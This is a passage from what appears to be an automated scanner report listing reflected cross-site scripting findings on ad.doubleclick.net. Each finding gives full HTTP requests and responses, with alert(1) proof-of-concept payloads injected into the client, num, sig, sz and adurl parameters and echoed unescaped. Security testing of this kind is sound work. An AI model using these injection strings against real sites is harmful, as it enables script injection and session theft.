Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7b"-alert(1)-"f629491b606 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b71b2'-alert(1)-'c477c344b94 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\">
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c9f"-alert(1)-"2dc82fe9c33 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600");
var fscUrl = url;
var f
...[SNIP]...

1.21. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8cd'-alert(1)-'b5744e625cb was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\">
...[SNIP]...

1.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc7"-alert(1)-"0a30ccb0824 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3026'-alert(1)-'e11fbbb3a32 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\">
...[SNIP]...

1.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82cb"-alert(1)-"4da37f8e4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:03:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u
...[SNIP]...

1.25. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a96'-alert(1)-'d3284128866 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nk\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u
...[SNIP]...

1.26. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d0bc'-alert(1)-'4aa45ed95d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7855
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:03 GMT
Expires: Thu, 03 Feb 2011 16:09:03 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4https://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604\">
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b43"-alert(1)-"4b5b2d05a2f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

